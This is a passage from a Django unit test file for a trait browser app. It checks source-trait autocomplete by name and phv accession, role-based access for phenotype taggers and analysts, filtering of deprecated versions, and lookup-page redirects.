self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 403)
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_queryset = models.SourceTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
class DCCAnalystTaggableStudyFilteredSourceTraitNameAutocompleteTest(DCCAnalystLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(DCCAnalystTaggableStudyFilteredSourceTraitNameAutocompleteTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
self.source_dataset = factories.SourceDatasetFactory.create(source_study_version=self.source_study_version)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for name in TEST_NAMES:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_trait_name=name))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:taggable:by-name')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source dataset and increment it. Link it to the new ssv.
source_dataset2 = copy(self.source_dataset)
source_dataset2.i_id += 1
source_dataset2.source_study_version = source_study_version2
source_dataset2.save()
# Copy the source traits and link them to the new source dataset.
source_traits2 = []
for trait in self.source_traits:
st2 = copy(trait)
st2.source_dataset = source_dataset2
st2.i_trait_id = trait.i_trait_id + len(self.source_traits)
st2.save()
source_traits2.append(st2)
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertNotIn(trait.i_trait_id, returned_pks)
def test_other_study_in_queryset(self):
"""Queryset returns traits from all studies."""
# Delete all source traits and make 5 new ones, so there are only 5 for study 1.
models.SourceTrait.objects.all().delete()
self.source_traits = factories.SourceTraitFactory.create_batch(5, source_dataset=self.source_dataset)
study2 = factories.StudyFactory.create()
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), models.SourceTrait.objects.all().count())
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_with_empty_taggable_studies(self):
"""View returns 200 code when the user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_remove_is_staff(self):
"""View returns 403 code when the user is no longer staff."""
self.user.is_staff = False
self.user.save()
self.user.refresh_from_db()
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 403)
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_queryset = models.SourceTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
class SourceTraitNameOrPHVAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(SourceTraitNameOrPHVAutocompleteTest, self).setUp()
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for phv in TEST_PHVS:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset__i_id=6, source_dataset__source_study_version__i_version=2,
source_dataset__source_study_version__i_is_deprecated=False,
i_dbgap_variable_accession=phv)
)
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:by-name-or-phv')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of traits with the same trait name."""
# Create an older, deprecated version of an existing source trait.
trait = self.source_traits[0]
# Make a new copy of the source study version, and decrement the version number.
ssv2 = copy(trait.source_dataset.source_study_version)
ssv2.i_version -= 1
ssv2.i_id += 1
ssv2.i_is_deprecated = True
ssv2.save()
# Make a new copy of the dataset, linked to older ssv.
ds2 = copy(trait.source_dataset)
ds2.i_id += 1
ds2.source_study_version = ssv2
ds2.save()
# Copy the source trait and link it to the older dataset.
trait2 = copy(trait)
trait2.source_dataset = ds2
trait2.i_trait_id += 1
trait2.save()
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url, {'q': trait.i_trait_name})
pks = get_autocomplete_view_ids(response)
self.assertIn(trait.pk, pks)
self.assertNotIn(trait2.pk, pks)
def test_correct_trait_found_by_name(self):
"""Queryset returns only the correct source trait when found by whole trait name."""
query_trait = self.source_traits[0]
url = self.get_url()
response = self.client.get(url, {'q': query_trait.i_trait_name})
returned_pks = get_autocomplete_view_ids(response)
# Get traits that have the same trait name, to account for how small the word lists for faker are.
traits_with_name = models.SourceTrait.objects.filter(i_trait_name=query_trait.i_trait_name)
self.assertEqual(len(returned_pks), len(traits_with_name))
for name_trait in traits_with_name:
self.assertIn(name_trait.pk, returned_pks)
def test_correct_trait_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source trait when found by whole name, with mismatched case."""
query_trait = self.source_traits[0]
url = self.get_url()
response = self.client.get(url, {'q': query_trait.i_trait_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
# Get traits that have the same trait name, to account for how small the word lists for faker are.
traits_with_name = models.SourceTrait.objects.filter(i_trait_name=query_trait.i_trait_name)
self.assertEqual(len(returned_pks), len(traits_with_name))
for name_trait in traits_with_name:
self.assertIn(name_trait.pk, returned_pks)
def test_phv_test_queries_without_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is not in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_phv_test_queries_with_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': 'phv' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
models.SourceTrait.objects.all().delete()
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for name in TEST_NAMES:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset__i_id=6, source_dataset__source_study_version__i_version=2,
source_dataset__source_study_version__i_is_deprecated=False,
i_trait_name=name)
)
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_queryset = models.SourceTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
def test_correct_trait_found_with_phv_in_name(self):
"""Queryset returns both traits when one has trait name of phvNNN and the other has phv NNN."""
models.SourceTrait.objects.all().delete()
name_trait = factories.SourceTraitFactory.create(i_trait_name='phv557')
phv_trait = factories.SourceTraitFactory.create(i_dbgap_variable_accession=557)
url = self.get_url()
response = self.client.get(url, {'q': 'phv557'})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), 2)
self.assertIn(name_trait.pk, returned_pks)
self.assertIn(phv_trait.pk, returned_pks)
class PhenotypeTaggerTaggableStudyFilteredSourceTraitNameOrPHVAutocompleteTest(PhenotypeTaggerLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(PhenotypeTaggerTaggableStudyFilteredSourceTraitNameOrPHVAutocompleteTest, self).setUp()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
self.source_dataset = factories.SourceDatasetFactory.create(source_study_version=self.source_study_version)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for phv in TEST_PHVS:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_dbgap_variable_accession=phv))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:taggable:by-name-or-phv')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_returns_all_traits_with_two_taggable_studies(self):
"""Queryset returns all of the traits from two different studies."""
# Delete all but five source traits, so that there are 5 from each study.
models.SourceTrait.objects.exclude(i_dbgap_variable_accession__in=TEST_PHVS[:5]).delete()
self.source_traits = list(models.SourceTrait.objects.all())
study2 = factories.StudyFactory.create()
self.user.profile.taggable_studies.add(study2)
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), len(self.source_traits + source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source dataset and increment it. Link it to the new ssv.
source_dataset2 = copy(self.source_dataset)
source_dataset2.i_id += 1
source_dataset2.source_study_version = source_study_version2
source_dataset2.save()
# Copy the source traits and link them to the new source dataset.
source_traits2 = []
for trait in self.source_traits:
st2 = copy(trait)
st2.source_dataset = source_dataset2
st2.i_trait_id = trait.i_trait_id + len(self.source_traits)
st2.save()
source_traits2.append(st2)
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertNotIn(trait.i_trait_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns only traits from the user's taggable studies."""
# Delete all but five source traits, so that there are 5 from each study.
models.SourceTrait.objects.exclude(i_dbgap_variable_accession__in=TEST_PHVS[:5]).delete()
self.source_traits = list(models.SourceTrait.objects.all())
study2 = factories.StudyFactory.create()
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), len(self.source_traits))
for trait in source_traits2:
self.assertNotIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_correct_trait_found_by_name(self):
"""Queryset returns only the correct source trait when found by whole trait name."""
query_trait = self.source_traits[0]
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': query_trait.i_trait_name})
returned_pks = get_autocomplete_view_ids(response)
# Get traits that have the same trait name, to account for how small the word lists for faker are.
traits_with_name = models.SourceTrait.objects.filter(i_trait_name=query_trait.i_trait_name)
self.assertEqual(len(returned_pks), len(traits_with_name))
for name_trait in traits_with_name:
self.assertIn(name_trait.pk, returned_pks)
def test_correct_trait_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source trait when found by whole name, with mismatched case."""
query_trait = self.source_traits[0]
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': query_trait.i_trait_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
# Get traits that have the same trait name, to account for how small the word lists for faker are.
traits_with_name = models.SourceTrait.objects.filter(i_trait_name=query_trait.i_trait_name)
self.assertEqual(len(returned_pks), len(traits_with_name))
for name_trait in traits_with_name:
self.assertIn(name_trait.pk, returned_pks)
def test_forbidden_empty_taggable_studies(self):
"""View returns 403 code when the user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 403)
def test_phv_test_queries_without_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is not in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_phv_test_queries_with_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': 'phv' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
models.SourceTrait.objects.all().delete()
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for name in TEST_NAMES:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_trait_name=name))
self.user.refresh_from_db()
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_queryset = models.SourceTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
def test_correct_trait_found_with_phv_in_name(self):
"""Queryset returns both traits when one has trait name of phvNNN and the other has phv NNN."""
models.SourceTrait.objects.all().delete()
study = models.Study.objects.all().first()
name_trait = factories.SourceTraitFactory.create(
i_trait_name='phv557', source_dataset__source_study_version__study=self.study)
phv_trait = factories.SourceTraitFactory.create(
i_dbgap_variable_accession=557, source_dataset__source_study_version__study=self.study)
url = self.get_url()
response = self.client.get(url, {'q': 'phv557'})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), 2)
self.assertIn(name_trait.pk, returned_pks)
self.assertIn(phv_trait.pk, returned_pks)
class DCCAnalystTaggableStudyFilteredSourceTraitNameOrPHVAutocompleteTest(DCCAnalystLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(DCCAnalystTaggableStudyFilteredSourceTraitNameOrPHVAutocompleteTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
self.source_dataset = factories.SourceDatasetFactory.create(source_study_version=self.source_study_version)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for phv in TEST_PHVS:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_dbgap_variable_accession=phv))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:traits:autocomplete:taggable:by-name-or-phv')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.source_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of a trait."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source dataset and increment it. Link it to the new ssv.
source_dataset2 = copy(self.source_dataset)
source_dataset2.i_id += 1
source_dataset2.source_study_version = source_study_version2
source_dataset2.save()
# Copy the source traits and link them to the new source dataset.
source_traits2 = []
for trait in self.source_traits:
st2 = copy(trait)
st2.source_dataset = source_dataset2
st2.i_trait_id = trait.i_trait_id + len(self.source_traits)
st2.save()
source_traits2.append(st2)
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(source_traits2))
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertNotIn(trait.i_trait_id, returned_pks)
def test_other_study_in_queryset(self):
"""Queryset returns traits from all studies."""
# Delete all but five source traits, so that there are 5 from each study.
models.SourceTrait.objects.exclude(i_dbgap_variable_accession__in=TEST_PHVS[:5]).delete()
self.source_traits = list(models.SourceTrait.objects.all())
study2 = factories.StudyFactory.create()
source_traits2 = factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version__study=study2)
# Get results from the autocomplete view and make sure only the correct study is found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that there's only one page of results.
self.assertTrue(models.SourceTrait.objects.all().count() <= 10)
self.assertEqual(len(returned_pks), models.SourceTrait.objects.all().count())
for trait in source_traits2:
self.assertIn(trait.i_trait_id, returned_pks)
for trait in self.source_traits:
self.assertIn(trait.i_trait_id, returned_pks)
def test_correct_trait_found_by_name(self):
"""Queryset returns only the correct source trait when found by whole trait name."""
query_trait = self.source_traits[0]
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': query_trait.i_trait_name})
returned_pks = get_autocomplete_view_ids(response)
# Get traits that have the same trait name, to account for how small the word lists for faker are.
traits_with_name = models.SourceTrait.objects.filter(
i_trait_name=query_trait.i_trait_name, source_dataset__source_study_version__study=self.study)
self.assertEqual(len(returned_pks), len(traits_with_name))
for name_trait in traits_with_name:
self.assertIn(name_trait.pk, returned_pks)
def test_correct_trait_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source trait when found by whole name, with mismatched case."""
query_trait = self.source_traits[0]
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': query_trait.i_trait_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
# Get traits that have the same trait name, to account for how small the word lists for faker are.
traits_with_name = models.SourceTrait.objects.filter(i_trait_name=query_trait.i_trait_name)
self.assertEqual(len(returned_pks), len(traits_with_name))
for name_trait in traits_with_name:
self.assertIn(name_trait.pk, returned_pks)
def test_with_empty_taggable_studies(self):
"""View returns 200 code when the user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_remove_is_staff(self):
"""View returns 403 code when the user is no longer staff."""
self.user.is_staff = False
self.user.save()
self.user.refresh_from_db()
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 403)
def test_phv_test_queries_without_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is not in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_phv_test_queries_with_phv_in_string(self):
"""Returns only the correct source trait for each of the TEST_PHV_QUERIES when 'phv' is in query string."""
url = self.get_url()
for query in TEST_PHV_QUERIES:
response = self.client.get(url, {'q': 'phv' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_PHV_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phv in expected_matches:
expected_pk = models.SourceTrait.objects.get(i_dbgap_variable_accession=expected_phv).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phv {} with query '{}'".format(expected_phv, query))
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
models.SourceTrait.objects.all().delete()
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_traits = []
for name in TEST_NAMES:
self.source_traits.append(factories.SourceTraitFactory.create(
source_dataset=self.source_dataset, i_trait_name=name))
self.user.refresh_from_db()
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_queryset = models.SourceTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
def test_correct_trait_found_with_phv_in_name(self):
"""Queryset returns both traits when one has trait name of phvNNN and the other has phv NNN."""
models.SourceTrait.objects.all().delete()
study = models.Study.objects.all().first()
name_trait = factories.SourceTraitFactory.create(
i_trait_name='phv557', source_dataset__source_study_version__study=self.study)
phv_trait = factories.SourceTraitFactory.create(
i_dbgap_variable_accession=557, source_dataset__source_study_version__study=self.study)
url = self.get_url()
response = self.client.get(url, {'q': 'phv557'})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), 2)
self.assertIn(name_trait.pk, returned_pks)
self.assertIn(phv_trait.pk, returned_pks)
class SourceObjectLookupTest(UserLoginTestCase):
"""Unit tests for the SourceObjectLookupTest view."""
def get_url(self):
return reverse('trait_browser:source:lookup')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has the proper context data."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('form', context)
self.assertIsInstance(context['form'], forms.SourceObjectLookupForm)
def test_redirects_to_study_lookup_page(self):
response = self.client.post(self.get_url(), {'object_type': 'study'})
self.assertRedirects(response, reverse('trait_browser:source:studies:lookup'))
def test_redirects_to_dataset_lookup_page(self):
response = self.client.post(self.get_url(), {'object_type': 'dataset'})
self.assertRedirects(response, reverse('trait_browser:source:datasets:lookup'))
def test_redirects_to_variable_lookup_page(self):
response = self.client.post(self.get_url(), {'object_type': 'trait'})
self.assertRedirects(response, reverse('trait_browser:source:traits:lookup'))
def test_error_with_invalid_choice(self):
response = self.client.post(self.get_url(), {'object_type': 'foo'})
self.assertEqual(response.status_code, 200)
context = response.context
self.assertIn('form', context)
self.assertFormError(response, 'form', 'object_type',
'Select a valid choice. foo is not one of the available choices.')
class StudyLookupTest(UserLoginTestCase):
"""Unit tests for the SourceStudyLookup view."""
def get_url(self):
return reverse('trait_browser:source:studies:lookup')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has the proper context data."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('object_type', context)
self.assertEqual(context['object_type'], 'study')
self.assertIn('form', context)
self.assertIsInstance(context['form'], forms.StudyLookupForm)
self.assertIn('text', context)
self.assertIsInstance(context['text'], str)
def test_redirects_to_study_detail_page(self):
"""View redirects to study detail page upon successful form submission."""
study = factories.StudyFactory.create()
# We need to create some datasets and traits so the detail page renders properly.
source_traits = factories.SourceTraitFactory.create_batch(
10, source_dataset__source_study_version__i_is_deprecated=False,
source_dataset__source_study_version__study=study)
response = self.client.post(self.get_url(), {'object': study.pk})
self.assertRedirects(response, reverse('trait_browser:source:studies:pk:detail', args=[study.pk]))
def test_error_with_empty_study_field(self):
"""View has form error with unsuccessful form submission."""
response = self.client.post(self.get_url(), {'object': ''})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'object',
'This field is required.')
def test_error_with_invalid_study(self):
"""View has form error if non-existent study is requested."""
# Use a study pk that doesn't exist.
response = self.client.post(self.get_url(), {'object': 1})
self.assertEqual(response.status_code, 200)
# Due to the autocomplete, this error is unlikely to occur.
self.assertFormError(response, 'form', 'object',
'Select a valid choice. That choice is not one of the available choices.')
class SourceDatasetLookupTest(UserLoginTestCase):
"""Unit tests for the SourceDatasetLookup view."""
def get_url(self):
return reverse('trait_browser:source:datasets:lookup')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has the proper context data."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('object_type', context)
self.assertEqual(context['object_type'], 'dataset')
self.assertIn('form', context)
self.assertIsInstance(context['form'], forms.SourceDatasetLookupForm)
self.assertIn('text', context)
self.assertIsInstance(context['text'], str)
def test_redirects_to_study_detail_page(self):
"""View redirects to study detail page upon successful form submission."""
dataset = factories.SourceDatasetFactory.create()
# We need to create some traits so the detail page renders properly.
source_traits = factories.SourceTraitFactory.create_batch(
10, source_dataset__source_study_version__i_is_deprecated=False,
source_dataset=dataset)
response = self.client.post(self.get_url(), {'object': dataset.pk})
self.assertRedirects(response, reverse('trait_browser:source:datasets:detail', args=[dataset.pk]))
def test_error_with_empty_dataset_field(self):
"""View has form error with unsuccessful form submission."""
response = self.client.post(self.get_url(), {'object': ''})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'object',
'This field is required.')
